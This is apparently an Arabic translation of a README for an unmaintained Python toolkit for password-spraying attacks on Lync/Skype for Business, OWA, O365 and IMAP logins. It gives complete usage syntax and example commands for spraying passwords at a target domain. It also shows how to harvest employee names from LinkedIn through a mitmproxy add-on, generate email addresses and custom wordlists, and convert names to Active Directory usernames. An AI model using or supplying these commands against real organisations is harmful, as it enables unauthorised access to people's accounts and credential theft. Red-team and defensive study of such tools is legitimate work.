
نصوص برمجية لجعل هجمات رش كلمات المرور ضد Lync/S4B وOWA وO365 أسرع بكثير، وأقل عناءً، وأكثر كفاءة.
لم يعد هذا المشروع مدعومًا. المشاريع البديلة التالية أفضل ويتم صيانتها بنشاط:
مجموعة من البرامج النصية/الأدوات المكتوبة بلغة Python تحاول أن تجعل هجمات رش كلمات المرور (password spraying) ضد Lync/S4B وOWA أسرع بكثير، وأقل إيلامًا، وأكثر كفاءة.
تفضل بالانضمام إلينا على ديسكورد!
قم بتثبيت المتطلبات الأساسية باستخدام pip3 كالتالي:
sudo -H pip3 install -r requirements.txt
أو استخدم بيئة Python الافتراضية إذا كنت لا تريد تثبيت الحزم على مستوى النظام.
أداة رش كلمات مرور فائقة السرعة لـ Lync/Skype for Business وOWA، مبنية على Asyncio وPython 3.7
Usage:
atomizer (lync|owa|imap) <target> <password> <userfile> [--targetPort PORT] [--threads THREADS] [--debug]
atomizer (lync|owa|imap) <target> <passwordfile> <userfile> --interval <TIME> [--gchat <URL>] [--slack <URL>] [--targetPort PORT][--threads THREADS] [--debug]
atomizer (lync|owa|imap) <target> --csvfile CSVFILE [--user-row-name NAME] [--pass-row-name NAME] [--targetPort PORT] [--threads THREADS] [--debug]
atomizer (lync|owa|imap) <target> --user-as-pass USERFILE [--targetPort PORT] [--threads THREADS] [--debug]
atomizer (lync|owa|imap) <target> --recon [--debug]
atomizer -h | --help
atomizer -v | --version
Arguments:
target target domain or url
password password to spray
userfile file containing usernames (one per line)
passwordfile file containing passwords (one per line)
Options:
-h, --help show this screen
-v, --version show version
-c, --csvfile CSVFILE csv file containing usernames and passwords
-i, --interval TIME spray at the specified interval [format: "H:M:S"]
-t, --threads THREADS number of concurrent threads to use [default: 3]
-d, --debug enable debug output
-p, --targetPort PORT target port of the IMAP server (IMAP only) [default: 993]
--recon only collect info, don't password spray
--gchat URL gchat webhook url for notification
--slack URL slack webhook url for notification
--user-row-name NAME username row title in CSV file [default: Email Address]
--pass-row-name NAME password row title in CSV file [default: Password]
--user-as-pass USERFILE use the usernames in the specified file as the password (one per line)
./atomizer.py owa contoso.com 'Fall2018' emails.txt
./atomizer.py lync contoso.com 'Fall2018' emails.txt
./atomizer lync contoso.com --csvfile accounts.csv
./atomizer lync contoso.com --user-as-pass usernames.txt
./atomizer owa 'https://owa.contoso.com/autodiscover/autodiscover.xml' --recon
./atomizer.py owa contoso.com passwords.txt emails.txt -i 0:45:00 --gchat <GCHAT_WEBHOOK_URL>
نسخة منقولة من إضافة @OrOneEqualsOne GatherContacts الخاصة بـ Burp إلى mitmproxy مع بعض التحسينات.
يجمع بيانات ملفات LinkedIn من Google وBing، وينشئ عناوين البريد الإلكتروني تلقائيًا من أسماء الملفات الشخصية باستخدام النمط المحدد، وينفذ هجمات رش كلمات المرور في الوقت الفعلي.
(مبني فوق Atomizer)
mitmdump -s vaporizer.py --set sprayer=(lync|owa) --set domain=domain.com --set target=<domain or url to spray> --set password=password --set email_format='{f}.{last}'
بشكل افتراضي، يتم تعيين email_format على النمط {first}.{last} وليس وسيطًا إلزاميًا.
معامل domain هو النطاق المستخدم لتوليد عناوين البريد الإلكتروني من الأسماء، ومعامل target هو النطاق أو الرابط الذي سيتم استهدافه برش كلمات المرور.
قم بتثبيت شهادة mitmproxy، واضبط البروكسي في متصفحك، ثم اذهب إلى Google و/أو Bing وابحث (تأكد من تضمين /in):
site:linkedin.com/in "Target Company Name"
سيتم حفظ عناوين البريد الإلكتروني في emails.txt بالتنسيق المحدد، ثم تمريرها إلى Atomizer لتنفيذ الرش.
يستخرج كل النصوص من موقع الهدف ويرسلها إلى AWS Comprehend لتحليلها وتوليد قوائم كلمات مخصصة لرش كلمات المرور.
لا يزال قيد التطوير
mitmdump -s aerosol.py --set domain=domain.com
يحوّل الأسماء إلى أسماء مستخدمين بصيغة Active Directory (مثل Alice Eve => CONTOSO\aeve)
Usage:
spindrift [<file>] [--target TARGET | --domain DOMAIN] [--format FORMAT]
Arguments:
file file containing names, can also read from stdin
Options:
--target TARGET optional domain or url to retrieve the internal domain name from OWA
--domain DOMAIN manually specify the domain to append to each username
--format FORMAT username format [default: {f}{last}]
يقرأ الأسماء من STDIN، ويُستخدم --domain لتحديد النطاق يدويًا:
cat names.txt | ./spindrift.py --domain CONTOSO
يقرأ الأسماء من names.txt، ويلتقط --target ديناميكيًا اسم النطاق الداخلي من OWA (يمكنك إعطاءه نطاقًا أو رابطًا)
./spindrift.py names.txt --target contoso.com